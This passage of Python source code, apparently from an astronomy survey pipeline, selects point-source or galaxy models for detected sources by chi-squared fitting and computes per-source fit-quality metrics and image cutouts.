force_pointsource_mask |= IN_BLOB['GALAXY']
force_pointsource = ((self.refmap[y0+iy,x0+ix] &
force_pointsource_mask) > 0)
fit_background_mask = IN_BLOB['BRIGHT']
if not self.less_masking:
fit_background_mask |= IN_BLOB['MEDIUM']
### HACK -- re-use this variable
if self.large_galaxies_force_pointsource:
fit_background_mask |= IN_BLOB['GALAXY']
fit_background = ((self.refmap[y0+iy,x0+ix] &
fit_background_mask) > 0)
if is_galaxy:
fit_background = False
# LSLGA galaxy: set the maximum allowed r_e.
known_galaxy_logrmax = 0.
if isinstance(src, (DevGalaxy,ExpGalaxy)):
print('Known galaxy. Initial shape:', src.shape)
# MAGIC 2. = factor by which r_e is allowed to grow for an LSLGA galaxy.
known_galaxy_logrmax = np.log(src.shape.re * 2.)
else:
print('WARNING: unknown galaxy type:', src)
debug('Source at blob coordinates', x0+ix, y0+iy, '- forcing pointsource?', force_pointsource, ', is large galaxy?', is_galaxy, ', fitting sky background:', fit_background)
if fit_background:
for tim in srctims:
tim.freezeAllBut('sky')
srctractor.thawParam('images')
skyparams = srctractor.images.getParams()
enable_galaxy_cache()
# Compute the log-likehood without a source here.
srccat[0] = None
if fit_background:
srctractor.optimize_loop(**self.optargs)
if self.plots_per_source:
model_mod_rgb = {}
model_resid_rgb = {}
# the "none" model
modimgs = list(srctractor.getModelImages())
co,nil = quick_coadds(srctims, self.bands, srcwcs, images=modimgs)
rgb = get_rgb(co, self.bands)
model_mod_rgb['none'] = rgb
res = [(tim.getImage() - mod) for tim,mod in zip(srctims, modimgs)]
co,nil = quick_coadds(srctims, self.bands, srcwcs, images=res)
rgb = get_rgb(co, self.bands)
model_resid_rgb['none'] = rgb
chisqs_none = _per_band_chisqs(srctractor, self.bands)
nparams = dict(psf=2, rex=3, exp=5, dev=5, ser=6)
# This is our "upgrade" threshold: how much better a galaxy
# fit has to be versus psf
galaxy_margin = 3.**2 + (nparams['exp'] - nparams['psf'])
# *chisqs* is actually chi-squared improvement vs no source;
# larger is a better fit.
chisqs = dict(none=0)
oldmodel, psf, rex, dev, exp = _initialize_models(src)
ser = None
trymodels = [('psf', psf)]
if oldmodel == 'psf':
if getattr(src, 'forced_point_source', False):
# This is set in the GaiaSource contructor from
# gaia.pointsource
debug('Gaia source is forced to be a point source -- not trying other models')
elif force_pointsource:
# Geometric mask
debug('Not computing galaxy models due to objects in blob')
else:
trymodels.append(('rex', rex))
# Try galaxy models if rex > psf, or if bright.
# The 'gals' model is just a marker
trymodels.append(('gals', None))
else:
# If the source was initialized as a galaxy, try all models
trymodels.extend([('rex', rex), ('dev', dev), ('exp', exp),
('ser', None)])
cputimes = {}
for name,newsrc in trymodels:
cpum0 = time.process_time()
if name == 'gals':
# If 'rex' was better than 'psf', or the source is
# bright, try the galaxy models.
chi_rex = chisqs.get('rex', 0)
chi_psf = chisqs.get('psf', 0)
margin = 1. # 1 parameter
if chi_rex > (chi_psf+margin) or max(chi_psf, chi_rex) > 400:
trymodels.extend([
('dev', dev), ('exp', exp), ('ser', None)])
continue
if name == 'ser' and newsrc is None:
# Start at the better of exp or dev.
smod = _select_model(chisqs, nparams, galaxy_margin)
if smod not in ['dev', 'exp']:
continue
if smod == 'dev':
newsrc = ser = SersicGalaxy(
dev.getPosition().copy(), dev.getBrightness().copy(),
dev.getShape().copy(), LegacySersicIndex(4.))
elif smod == 'exp':
newsrc = ser = SersicGalaxy(
exp.getPosition().copy(), exp.getBrightness().copy(),
exp.getShape().copy(), LegacySersicIndex(1.))
#print('Initialized SER model:', newsrc)
srccat[0] = newsrc
# Set maximum galaxy model sizes
if is_galaxy:
# This is a known large galaxy -- set max size based on initial size.
logrmax = known_galaxy_logrmax
if name in ('rex', 'exp', 'dev', 'ser'):
newsrc.shape.setMaxLogRadius(logrmax)
else:
# FIXME -- could use different fractions for deV vs exp (or comp)
fblob = 0.8
sh,sw = srcwcs.shape
logrmax = np.log(fblob * max(sh, sw) * self.pixscale)
if name in ['rex', 'exp', 'dev', 'ser']:
if logrmax < newsrc.shape.getMaxLogRadius():
newsrc.shape.setMaxLogRadius(logrmax)
# Use the same modelMask shapes as the original source ('src').
# Need to create newsrc->mask mappings though:
mm = remap_modelmask(modelMasks, src, newsrc)
srctractor.setModelMasks(mm)
enable_galaxy_cache()
if fit_background:
# Reset sky params
srctractor.images.setParams(skyparams)
srctractor.thawParam('images')
# First-round optimization (during model selection)
R = srctractor.optimize_loop(**self.optargs)
#print('Fit result:', newsrc)
#print('Steps:', R['steps'])
hit_limit = R.get('hit_limit', False)
opt_steps = R.get('steps', -1)
if hit_limit:
if name in ['rex', 'exp', 'dev', 'ser']:
debug('Hit limit: r %.2f vs %.2f' %
(newsrc.shape.re, np.exp(logrmax)))
ok,ix,iy = srcwcs.radec2pixelxy(newsrc.getPosition().ra,
newsrc.getPosition().dec)
ix = int(ix-1)
iy = int(iy-1)
sh,sw = srcblobmask.shape
if ix < 0 or iy < 0 or ix >= sw or iy >= sh or not srcblobmask[iy,ix]:
# Exited blob!
debug('Source exited sub-blob!')
if mask_others:
for ie,tim in zip(saved_srctim_ies, srctims):
tim.inverr = ie
continue
disable_galaxy_cache()
if self.plots_per_source:
# save RGB images for the model
modimgs = list(srctractor.getModelImages())
co,nil = quick_coadds(srctims, self.bands, srcwcs, images=modimgs)
rgb = get_rgb(co, self.bands)
model_mod_rgb[name] = rgb
res = [(tim.getImage() - mod) for tim,mod in zip(srctims, modimgs)]
co,nil = quick_coadds(srctims, self.bands, srcwcs, images=res)
rgb = get_rgb(co, self.bands)
model_resid_rgb[name] = rgb
# Compute inverse-variances for each source.
# Convert to "vanilla" ellipse parameterization
# (but save old shapes first)
# we do this (rather than making a copy) because we want to
# use the same modelMask maps.
if isinstance(newsrc, (DevGalaxy, ExpGalaxy, SersicGalaxy)):
oldshape = newsrc.shape
if fit_background:
# We have to freeze the sky here before computing
# uncertainties
srctractor.freezeParam('images')
nsrcparams = newsrc.numberOfParams()
_convert_ellipses(newsrc)
assert(newsrc.numberOfParams() == nsrcparams)
# Compute a very approximate "fracin" metric (fraction of flux in masked model image
# versus total flux of model), to avoid wild extrapolation when nearly unconstrained.
fracin = dict([(b, []) for b in self.bands])
fluxes = dict([(b, newsrc.getBrightness().getFlux(b)) for b in self.bands])
for tim,mod in zip(srctims, srctractor.getModelImages()):
f = (mod * (tim.getInvError() > 0)).sum() / fluxes[tim.band]
#print('Model image for', tim.name, ': has fracin = %.3g' % f)
fracin[tim.band].append(f)
for band in self.bands:
if len(fracin[band]) == 0:
continue
f = np.mean(fracin[band])
if f < 1e-6:
#print('Source', newsrc, ': setting flux in band', band,
# 'to zero based on fracin = %.3g' % f)
newsrc.getBrightness().setFlux(band, 0.)
# Compute inverse-variances
# This uses the second-round modelMasks.
allderivs = srctractor.getDerivs()
ivars = _compute_invvars(allderivs)
assert(len(ivars) == nsrcparams)
# If any fluxes have zero invvar, zero out the flux.
params = newsrc.getParams()
reset = False
for i,(pname,p,iv) in enumerate(zip(newsrc.getParamNames(), newsrc.getParams(), ivars)):
#print(' ', pname, '=', p, 'iv', iv, 'sigma', 1./np.sqrt(iv))
if iv == 0:
#print('Resetting', pname, '=', 0)
params[i] = 0.
reset = True
if reset:
newsrc.setParams(params)
allderivs = srctractor.getDerivs()
ivars = _compute_invvars(allderivs)
assert(len(ivars) == nsrcparams)
B.all_model_ivs[srci][name] = np.array(ivars).astype(np.float32)
B.all_models[srci][name] = newsrc.copy()
assert(B.all_models[srci][name].numberOfParams() == nsrcparams)
# Now revert the ellipses!
if isinstance(newsrc, (DevGalaxy, ExpGalaxy, SersicGalaxy)):
newsrc.shape = oldshape
# Use the original 'srctractor' here so that the different
# models are evaluated on the same pixels.
ch = _per_band_chisqs(srctractor, self.bands)
chisqs[name] = _chisq_improvement(newsrc, ch, chisqs_none)
cpum1 = time.process_time()
B.all_model_cpu[srci][name] = cpum1 - cpum0
cputimes[name] = cpum1 - cpum0
B.all_model_hit_limit[srci][name] = hit_limit
B.all_model_opt_steps[srci][name] = opt_steps
if mask_others:
for tim,ie in zip(srctims, saved_srctim_ies):
# revert tim to original (unmasked-by-others)
tim.inverr = ie
# After model selection, revert the sky
# (srctims=tims when not bigblob)
if fit_background:
srctractor.images.setParams(skyparams)
# Actually select which model to keep. This "modnames"
# array determines the order of the elements in the DCHISQ
# column of the catalog.
modnames = ['psf', 'rex', 'dev', 'exp', 'ser']
keepmod = _select_model(chisqs, nparams, galaxy_margin)
if keepmod is None and getattr(src, 'reference_star', False):
# Definitely keep ref stars (Gaia & Tycho)
print('Forcing keeping reference source:', psf)
keepmod = 'psf'
keepsrc = {'none':None, 'psf':psf, 'rex':rex,
'dev':dev, 'exp':exp, 'ser':ser}[keepmod]
bestchi = chisqs.get(keepmod, 0.)
B.dchisq[srci, :] = np.array([chisqs.get(k,0) for k in modnames])
#print('Keeping model', keepmod, '(chisqs: ', chisqs, ')')
if keepsrc is not None and bestchi == 0.:
# Weird edge case, or where some best-fit fluxes go
# negative. eg
# https://github.com/legacysurvey/legacypipe/issues/174
debug('Best dchisq is 0 -- dropping source')
keepsrc = None
B.hit_limit[srci] = B.all_model_hit_limit[srci].get(keepmod, False)
# This is the model-selection plot
if self.plots_per_source:
import pylab as plt
plt.clf()
rows,cols = 3, 6
modnames = ['none', 'psf', 'rex', 'dev', 'exp', 'ser']
# Top-left: image
plt.subplot(rows, cols, 1)
coimgs, cons = quick_coadds(srctims, self.bands, srcwcs)
rgb = get_rgb(coimgs, self.bands)
dimshow(rgb, ticks=False)
# next over: rgb with same stretch as models
plt.subplot(rows, cols, 2)
rgb = get_rgb(coimgs, self.bands)
dimshow(rgb, ticks=False)
for imod,modname in enumerate(modnames):
if modname != 'none' and not modname in chisqs:
continue
axes = []
# Second row: models
plt.subplot(rows, cols, 1+imod+1*cols)
rgb = model_mod_rgb[modname]
dimshow(rgb, ticks=False)
axes.append(plt.gca())
plt.title(modname)
# Third row: residuals (not chis)
plt.subplot(rows, cols, 1+imod+2*cols)
rgb = model_resid_rgb[modname]
dimshow(rgb, ticks=False)
axes.append(plt.gca())
plt.title('chisq %.0f' % chisqs[modname], fontsize=8)
# Highlight the model to be kept
if modname == keepmod:
for ax in axes:
for spine in ax.spines.values():
spine.set_edgecolor('red')
spine.set_linewidth(2)
plt.suptitle('Blob %s, src %i (psf: %s, fitbg: %s): keep %s\n%s\nwas: %s' %
(self.name, srci, force_pointsource, fit_background,
keepmod, str(keepsrc), str(src)), fontsize=10)
self.ps.savefig()
return keepsrc
    def _optimize_individual_sources(self, tr, cat, Ibright, cputime):
        '''
        Optimize the sources in catalog *cat*, one at a time, in the
        brightness order given by index array *Ibright*, WITHOUT
        subtracting the other sources' models from the images.
        Accumulates per-source CPU seconds into the *cputime* array.
        '''
        # Single source (though this is coded to handle multiple sources)
        # Fit sources one at a time, but don't subtract other models
        cat.freezeAllParams()
        # Pre-compute a model patch per (tim, source); these patches
        # define the pixel regions (model masks) used during fitting.
        models = SourceModels()
        models.create(self.tims, cat)
        enable_galaxy_cache()
        for i in Ibright:
            cpu0 = time.process_time()
            # Thaw only source i; all other catalog params stay fixed.
            cat.freezeAllBut(i)
            src = cat[i]
            if getattr(src, 'freezeparams', False):
                debug('Frozen source', src, '-- keeping as-is!')
                continue
            # NOTE(review): first argument is 0, not i -- presumably
            # SourceModels.model_masks indexes tims, not sources; confirm
            # against its definition (not visible here).
            modelMasks = models.model_masks(0, cat[i])
            tr.setModelMasks(modelMasks)
            tr.optimize_loop(**self.optargs)
            cpu1 = time.process_time()
            cputime[i] += (cpu1 - cpu0)
        # Leave the tractor in a clean state for subsequent fitting stages.
        tr.setModelMasks(None)
        disable_galaxy_cache()
def tractor(self, tims, cat):
tr = Tractor(tims, cat, **self.trargs)
tr.freezeParams('images')
return tr
    def _optimize_individual_sources_subtract(self, cat, Ibright,
                                              cputime):
        '''
        Optimize sources one at a time, fitting each against images from
        which all *other* sources' current models have been subtracted.
        Accumulates per-source CPU seconds into *cputime*.  The tim
        images are mutated during the loop and restored at the end.
        '''
        # -Remember the original images
        # -Compute initial models for each source (in each tim)
        # -Subtract initial models from images
        # -During fitting, for each source:
        #   -add back in the source's initial model (to each tim)
        #   -fit, with Catalog([src])
        #   -subtract final model (from each tim)
        # -Replace original images
        models = SourceModels()
        # Remember original tim images
        models.save_images(self.tims)
        # Create & subtract initial models for each tim x each source
        models.create(self.tims, cat, subtract=True)
        # For sources, in decreasing order of brightness
        for numi,srci in enumerate(Ibright):
            cpu0 = time.process_time()
            src = cat[srci]
            if getattr(src, 'freezeparams', False):
                debug('Frozen source', src, '-- keeping as-is!')
                continue
            debug('Fitting source', srci, '(%i of %i in blob %s)' %
                  (numi+1, len(Ibright), self.name), ':', src)
            # Add this source's initial model back in.
            models.add(srci, self.tims)
            if self.bigblob:
                # Create super-local sub-sub-tims around this source
                # Make the subimages the same size as the modelMasks.
                mods = [mod[srci] for mod in models.models]
                srctims,modelMasks = _get_subimages(self.tims, mods, src)
                # We plots only the first & last three sources
                if self.plots_per_source and (numi < 3 or numi >= len(Ibright)-3):
                    import pylab as plt
                    plt.clf()
                    # Recompute coadds because of the subtract-all-and-readd shuffle
                    coimgs,_ = quick_coadds(self.tims, self.bands, self.blobwcs,
                                            fill_holes=False)
                    rgb = get_rgb(coimgs, self.bands)
                    dimshow(rgb)
                    ax = plt.axis()
                    # Outline each sub-tim's footprint in blob pixel coords.
                    for tim in srctims:
                        h,w = tim.shape
                        tx,ty = [0,0,w,w,0], [0,h,h,0,0]
                        rd = [tim.getWcs().pixelToPosition(xi,yi)
                              for xi,yi in zip(tx,ty)]
                        ra = [p.ra for p in rd]
                        dec = [p.dec for p in rd]
                        ok,x,y = self.blobwcs.radec2pixelxy(ra, dec)
                        plt.plot(x, y, 'b-')
                        ra,dec = tim.subwcs.pixelxy2radec(tx, ty)
                        ok,x,y = self.blobwcs.radec2pixelxy(ra, dec)
                        plt.plot(x, y, 'c-')
                    plt.title('source %i of %i' % (numi, len(Ibright)))
                    plt.axis(ax)
                    self.ps.savefig()
            else:
                srctims = self.tims
                modelMasks = models.model_masks(srci, src)
            srctractor = self.tractor(srctims, [src])
            srctractor.setModelMasks(modelMasks)
            # First-round optimization
            #print('First-round initial log-prob:', srctractor.getLogProb())
            srctractor.optimize_loop(**self.optargs)
            #print('First-round final log-prob:', srctractor.getLogProb())
            # Re-remove the final fit model for this source
            models.update_and_subtract(srci, src, self.tims)
            srctractor.setModelMasks(None)
            disable_galaxy_cache()
            #print('Fitting source took', Time()-tsrc)
            #print(src)
            cpu1 = time.process_time()
            cputime[srci] += (cpu1 - cpu0)
        # Put the untouched images back on the tims.
        models.restore_images(self.tims)
        del models
def _fit_fluxes(self, cat, tims, bands):
cat.thawAllRecursive()
for src in cat:
src.freezeAllBut('brightness')
for b in bands:
for src in cat:
src.getBrightness().freezeAllBut(b)
# Images for this band
btims = [tim for tim in tims if tim.band == b]
btr = self.tractor(btims, cat)
btr.optimize_forced_photometry(shared_params=False, wantims=False)
cat.thawAllRecursive()
def _plots(self, tr, title):
plotmods = []
plotmodnames = []
plotmods.append(list(tr.getModelImages()))
plotmodnames.append(title)
for tim in tr.images:
if hasattr(tim, 'resamp'):
del tim.resamp
_plot_mods(tr.images, plotmods, self.blobwcs, plotmodnames, self.bands,
None, None, None,
self.blobw, self.blobh, self.ps, chi_plots=False)
for tim in tr.images:
if hasattr(tim, 'resamp'):
del tim.resamp
def _plot_coadd(self, tims, wcs, model=None, resid=None):
if resid is not None:
mods = list(resid.getChiImages())
coimgs,_ = quick_coadds(tims, self.bands, wcs, images=mods,
fill_holes=False)
dimshow(get_rgb(coimgs,self.bands, **rgbkwargs_resid))
return
mods = None
if model is not None:
mods = list(model.getModelImages())
coimgs,_ = quick_coadds(tims, self.bands, wcs, images=mods,
fill_holes=False)
dimshow(get_rgb(coimgs,self.bands))
    def _initial_plots(self):
        '''
        Diagnostic plots: the blob's RGB coadd, and the initial source
        positions (reference sources circled in green).
        '''
        import pylab as plt
        debug('Plotting blob image for blob', self.name)
        coimgs,_ = quick_coadds(self.tims, self.bands, self.blobwcs,
                                fill_holes=False)
        # Cache the RGB image; later plots in this class reuse it.
        self.rgb = get_rgb(coimgs, self.bands)
        plt.clf()
        dimshow(self.rgb)
        plt.title('Blob: %s' % self.name)
        self.ps.savefig()
        if self.plots_single:
            # Save a standalone copy on figure 2, then switch back.
            plt.figure(2)
            dimshow(self.rgb, ticks=False)
            plt.savefig('blob-%s-data.png' % (self.name))
            plt.figure(1)
        # Blob pixel coords of all sources (FITS-style 1-indexed; hence
        # the -1 offsets when plotting).
        ok,x0,y0 = self.blobwcs.radec2pixelxy(
            np.array([src.getPosition().ra for src in self.srcs]),
            np.array([src.getPosition().dec for src in self.srcs]))
        ax = plt.axis()
        plt.plot(x0-1, y0-1, 'r.')
        # ref sources
        for x,y,src in zip(x0,y0,self.srcs):
            if is_reference_source(src):
                plt.plot(x-1, y-1, 'o', mec='g', mfc='none')
        plt.axis(ax)
        plt.title('initial sources')
        self.ps.savefig()
    def create_tims(self, timargs):
        '''
        Build local tractor Image ('tim') objects from the unpacked
        per-image ingredients in *timargs*, masking pixels outside the
        blob.  Returns the list of tims (images with no blob overlap
        are dropped).
        '''
        from legacypipe.bits import DQ_BITS
        # In order to make multiprocessing easier, the one_blob method
        # is passed all the ingredients to make local tractor Images
        # rather than the Images themselves. Here we build the
        # 'tims'.
        tims = []
        for (img, inverr, dq, twcs, wcsobj, pcal, sky, subpsf, name,
             sx0, sx1, sy0, sy1, band, sig1, imobj) in timargs:
            # Mask out inverr for pixels that are not within the blob.
            try:
                Yo,Xo,Yi,Xi,_ = resample_with_wcs(wcsobj, self.blobwcs,
                                                  intType=np.int16)
            except OverlapError:
                # This image does not overlap the blob at all.
                continue
            if len(Yo) == 0:
                continue
            # Keep inverr only where the blob mask is set; zero elsewhere.
            inverr2 = np.zeros_like(inverr)
            I = np.flatnonzero(self.blobmask[Yi,Xi])
            inverr2[Yo[I],Xo[I]] = inverr[Yo[I],Xo[I]]
            inverr = inverr2
            # If the subimage (blob) is small enough, instantiate a
            # constant PSF model in the center.
            h,w = img.shape
            if h < 400 and w < 400:
                subpsf = subpsf.constantPsfAt(w/2., h/2.)
            tim = Image(data=img, inverr=inverr, wcs=twcs,
                        psf=subpsf, photocal=pcal, sky=sky, name=name)
            tim.band = band
            tim.sig1 = sig1
            tim.subwcs = wcsobj
            tim.meta = imobj
            # Approximate FWHM -> Gaussian sigma conversion (2.355 ~ 2*sqrt(2 ln 2)).
            tim.psf_sigma = imobj.fwhm / 2.35
            tim.dq = dq
            tim.dq_saturation_bits = DQ_BITS['satur']
            tims.append(tim)
        return tims
def _convert_ellipses(src):
    '''Re-express a galaxy's shape in the plain EllipseE parameterization.'''
    galaxy_types = (DevGalaxy, ExpGalaxy, SersicGalaxy)
    if isinstance(src, galaxy_types):
        src.shape = src.shape.toEllipseE()
        if isinstance(src, RexGalaxy):
            # REX is round by construction: pin its ellipticities at zero.
            src.shape.freezeParams('e1', 'e2')
def _compute_invvars(allderivs):
    '''
    Approximate per-parameter inverse-variances: for each parameter,
    sum over images of (d model / d param * inverse-error)^2.
    '''
    invvars = []
    for paramderivs in allderivs:
        total = 0
        for deriv, tim in paramderivs:
            imh, imw = tim.shape
            deriv.clipTo(imw, imh)
            inverr = tim.getInvError()
            sub = deriv.getSlice(inverr)
            chi = deriv.patch * inverr[sub]
            total += np.sum(chi ** 2)
        invvars.append(total)
    return invvars
def _argsort_by_brightness(cat, bands, ref_first=False):
    '''
    Return indices ordering *cat* from brightest to faintest, using the
    (crude) sum of per-band fluxes as the brightness measure.  With
    ref_first=True, reference sources are forced to the front.
    '''
    totals = []
    for src in cat:
        # HACK -- here we just *sum* the nanomaggies in each band. Bogus!
        brightness = src.getBrightness()
        total = sum(brightness.getFlux(band) for band in bands)
        if ref_first and is_reference_source(src):
            # A huge flux offset pushes reference sources to the front.
            total += 1e6
        totals.append(total)
    return np.argsort(-np.array(totals))
def is_reference_source(src):
    '''True if *src* carries the is_reference_source flag (set elsewhere).'''
    flagged = getattr(src, 'is_reference_source', False)
    return flagged
def _compute_source_metrics(srcs, tims, bands, tr):
    '''
    Compute per-source, per-band quality metrics from the fitted models.

    Returns a dict of arrays, each of shape (len(srcs), len(bands)):
      fracin     -- fraction of the source's flux inside its model patch
      fracflux   -- profile-weighted flux from other sources (blending)
      rchisq     -- profile-weighted reduced chi-squared
      fracmasked -- profile-weighted fraction of masked pixels
    '''
    # rchi2 quality-of-fit metric
    rchi2_num = np.zeros((len(srcs),len(bands)), np.float32)
    rchi2_den = np.zeros((len(srcs),len(bands)), np.float32)
    # fracflux degree-of-blending metric
    fracflux_num = np.zeros((len(srcs),len(bands)), np.float32)
    fracflux_den = np.zeros((len(srcs),len(bands)), np.float32)
    # fracin flux-inside-blob metric
    fracin_num = np.zeros((len(srcs),len(bands)), np.float32)
    fracin_den = np.zeros((len(srcs),len(bands)), np.float32)
    # fracmasked: fraction of masked pixels metric
    fracmasked_num = np.zeros((len(srcs),len(bands)), np.float32)
    fracmasked_den = np.zeros((len(srcs),len(bands)), np.float32)
    for iband,band in enumerate(bands):
        for tim in tims:
            if tim.band != band:
                continue
            mod = np.zeros(tim.getModelShape(), tr.modtype)
            srcmods = [None for src in srcs]
            counts = np.zeros(len(srcs))
            pcal = tim.getPhotoCal()
            # For each source, compute its model and record its flux
            # in this image. Also compute the full model *mod*.
            for isrc,src in enumerate(srcs):
                patch = tr.getModelPatch(tim, src)
                if patch is None or patch.patch is None:
                    continue
                counts[isrc] = np.sum([np.abs(pcal.brightnessToCounts(b))
                                       for b in src.getBrightnesses()])
                if counts[isrc] == 0:
                    continue
                H,W = mod.shape
                patch.clipTo(W,H)
                srcmods[isrc] = patch
                patch.addTo(mod)
            # Now compute metrics for each source
            for isrc,patch in enumerate(srcmods):
                if patch is None:
                    continue
                if patch.patch is None:
                    continue
                if counts[isrc] == 0:
                    continue
                if np.sum(patch.patch**2) == 0:
                    continue
                slc = patch.getSlice(mod)
                patch = patch.patch
                # print('fracflux: band', band, 'isrc', isrc, 'tim', tim.name)
                # print('src:', srcs[isrc])
                # print('patch sum', np.sum(patch),'abs',np.sum(np.abs(patch)))
                # print('counts:', counts[isrc])
                # print('mod slice sum', np.sum(mod[slc]))
                # print('mod[slc] - patch:', np.sum(mod[slc] - patch))
                # (mod - patch) is flux from others
                # (mod - patch) / counts is normalized flux from others
                # We take that and weight it by this source's profile;
                # patch / counts is unit profile
                # But this takes the dot product between the profiles,
                # so we have to normalize appropriately, ie by
                # (patch**2)/counts**2; counts**2 drops out of the
                # denom. If you have an identical source with twice the flux,
                # this results in fracflux being 2.0
                # fraction of this source's flux that is inside this patch.
                # This can be < 1 when the source is near an edge, or if the
                # source is a huge diffuse galaxy in a small patch.
                fin = np.abs(np.sum(patch) / counts[isrc])
                # print('fin:', fin)
                # print('fracflux_num: fin *',
                #       np.sum((mod[slc] - patch) * np.abs(patch)) /
                #       np.sum(patch**2))
                fracflux_num[isrc,iband] += (fin *
                    np.sum((mod[slc] - patch) * np.abs(patch)) /
                    np.sum(patch**2))
                fracflux_den[isrc,iband] += fin
                fracmasked_num[isrc,iband] += (
                    np.sum((tim.getInvError()[slc] == 0) * np.abs(patch)) /
                    np.abs(counts[isrc]))
                fracmasked_den[isrc,iband] += fin
                fracin_num[isrc,iband] += np.abs(np.sum(patch))
                fracin_den[isrc,iband] += np.abs(counts[isrc])
            # Add the sky model before computing chi-squared.
            tim.getSky().addTo(mod)
            chisq = ((tim.getImage() - mod) * tim.getInvError())**2
            for isrc,patch in enumerate(srcmods):
                if patch is None or patch.patch is None:
                    continue
                if counts[isrc] == 0:
                    continue
                slc = patch.getSlice(mod)
                # We compute numerator and denom separately to handle
                # edge objects, where sum(patch.patch) < counts.
                # Also, to normalize by the number of images. (Being
                # on the edge of an image is like being in half an
                # image.)
                rchi2_num[isrc,iband] += (np.sum(chisq[slc] * patch.patch) /
                                          counts[isrc])
                # If the source is not near an image edge,
                # sum(patch.patch) == counts[isrc].
                rchi2_den[isrc,iband] += np.sum(patch.patch) / counts[isrc]
    #print('Fracflux_num:', fracflux_num)
    #print('Fracflux_den:', fracflux_den)
    fracflux = fracflux_num / fracflux_den
    rchi2 = rchi2_num / rchi2_den
    fracmasked = fracmasked_num / fracmasked_den
    # Eliminate NaNs (these happen when, eg, we have no coverage in one band but
    # sources detected in another band, hence denominator is zero)
    fracflux [ fracflux_den == 0] = 0.
    rchi2 [ rchi2_den == 0] = 0.
    fracmasked[fracmasked_den == 0] = 0.
    # fracin_{num,den} are in flux * nimages units
    tinyflux = 1e-9
    fracin = fracin_num / np.maximum(tinyflux, fracin_den)
    return dict(fracin=fracin, fracflux=fracflux, rchisq=rchi2,
                fracmasked=fracmasked)
def _initialize_models(src):
    '''
    Create the initial model-selection candidates (point source, round
    exponential "REX", deVaucouleurs, exponential) seeded from the
    current source *src*.

    Returns (oldmodel, psf, rex, dev, exp), where *oldmodel* is the
    string name ('psf', 'dev' or 'exp') of the model type *src*
    currently has.

    Raises ValueError for unsupported source types (previously this
    case fell through and crashed with an UnboundLocalError at the
    return statement).
    '''
    from legacypipe.survey import LogRadius
    if isinstance(src, PointSource):
        psf = src.copy()
        rex = RexGalaxy(src.getPosition(), src.getBrightness(),
                        LogRadius(-1.)).copy()
        # logr, ee1, ee2
        shape = LegacyEllipseWithPriors(-1., 0., 0.)
        dev = DevGalaxy(src.getPosition(), src.getBrightness(), shape).copy()
        exp = ExpGalaxy(src.getPosition(), src.getBrightness(), shape).copy()
        oldmodel = 'psf'
    elif isinstance(src, DevGalaxy):
        # BUG FIX: this branch previously never assigned 'psf', so the
        # return below raised UnboundLocalError for deV sources.  Seed
        # the point-source model as in the ExpGalaxy branch.
        psf = PointSource(src.getPosition(), src.getBrightness()).copy()
        rex = RexGalaxy(src.getPosition(), src.getBrightness(),
                        LogRadius(np.log(src.getShape().re))).copy()
        dev = src.copy()
        exp = ExpGalaxy(src.getPosition(), src.getBrightness(),
                        src.getShape()).copy()
        oldmodel = 'dev'
    elif isinstance(src, ExpGalaxy):
        psf = PointSource(src.getPosition(), src.getBrightness()).copy()
        rex = RexGalaxy(src.getPosition(), src.getBrightness(),
                        LogRadius(np.log(src.getShape().re))).copy()
        dev = DevGalaxy(src.getPosition(), src.getBrightness(),
                        src.getShape()).copy()
        exp = src.copy()
        oldmodel = 'exp'
    else:
        # Fail fast with a clear message instead of an UnboundLocalError.
        raise ValueError('_initialize_models: unsupported source type: %s'
                         % str(type(src)))
    return oldmodel, psf, rex, dev, exp
def _get_subimages(tims, mods, src):
    '''
    Cut each tim down to the footprint of its model patch for *src*.
    Tims whose model is None or empty are dropped.  Returns the
    parallel lists (subtims, modelMasks).
    '''
    subtims = []
    masks = []
    #print('Big blob: trimming:')
    for tim, mod in zip(tims, mods):
        if mod is None:
            continue
        mh, mw = mod.shape
        if mh == 0 or mw == 0:
            continue
        # The sub-image covers exactly the model patch, so the model
        # mask starts at (0,0) in sub-image coordinates.
        masks.append({src: ModelMask(0, 0, mw, mh)})
        x0, y0 = mod.x0, mod.y0
        x1, y1 = x0 + mw, y0 + mh
        sub = _get_subtim(tim, x0, x1, y0, y1)
        if sub.shape != (mh, mw):
            print('Subtim was not the shape expected:', sub.shape,
                  'image shape', tim.getImage().shape, 'slice y', y0, y1,
                  'x', x0, x1, 'mod shape', mh, mw)
        subtims.append(sub)
    return subtims, masks
def _get_subtim(tim, x0, x1, y0, y1):
    '''
    Cut *tim* to the pixel box [x0,x1) x [y0,y1), shifting its WCS and
    sky models and carrying over its metadata.
    '''
    box = slice(y0, y1), slice(x0, x1)
    # Constant PSF model evaluated at the center of the cutout.
    psf = tim.psf.constantPsfAt((x0 + x1) / 2., (y0 + y1) / 2.)
    sub = Image(data=tim.getImage()[box],
                inverr=tim.getInvError()[box],
                wcs=tim.wcs.shifted(x0, y0),
                psf=psf,
                photocal=tim.getPhotoCal(),
                sky=tim.sky.shifted(x0, y0),
                name=tim.name)
    subh, subw = sub.shape
    sub.subwcs = tim.subwcs.get_subimage(x0, y0, subw, subh)
    sub.band = tim.band
    sub.sig1 = tim.sig1
    sub.x0 = x0
    sub.y0 = y0
    sub.fulltim = tim
    sub.meta = tim.meta
    sub.psf_sigma = tim.psf_sigma
    if tim.dq is None:
        sub.dq = None
    else:
        sub.dq = tim.dq[box]
        sub.dq_saturation_bits = tim.dq_saturation_bits
    return sub
class SourceModels(object):
'''
This class maintains a list of the model patches for a set of sources
in a set of images.
'''
    def __init__(self):
        # Whether the model masks cover the full model-patch footprint.
        self.filledModelMasks = True
def save_images(self, tims):
self.orig_images = [tim.getImage() for tim in tims]
for tim,img in zip(tims, self.orig_images):
tim.data = img.copy()
def restore_images(self, tims):
for tim,img in zip(tims, self.orig_images):
tim.data = img
def create(self, tims, srcs, subtract=False, modelmasks=None):
'''
Note that this modifies the *tims* if subtract=True.
'''
self.models = []
for itim,tim in enumerate(tims):
mods = []
sh = tim.shape
ie = tim.getInvError()
for src in srcs:
mm = None
if modelmasks is not None:
mm = modelmasks[itim].get(src, None)
mod = src.getModelPatch(tim, modelMask=mm)
if mod is not None and mod.patch is not None:
if not np.all(np.isfinite(mod.patch)):
print('Non-finite mod patch')
print('source:', src)
print('tim:', tim)
print('PSF:', tim.getPsf())
assert(np.all(np.isfinite(mod.patch)))
mod = _clip_model_to_blob(mod, sh, ie)
if subtract and mod is not None:
mod.addTo(tim.getImage(), scale=-1)
mods.append(mod)
self.models.append(mods)
def add(self, i, tims):
'''
Adds the models for source *i* back into the tims.
'''
for tim,mods in zip(tims, self.models):
mod = mods[i]
if mod is not None:
mod.addTo(tim.getImage())
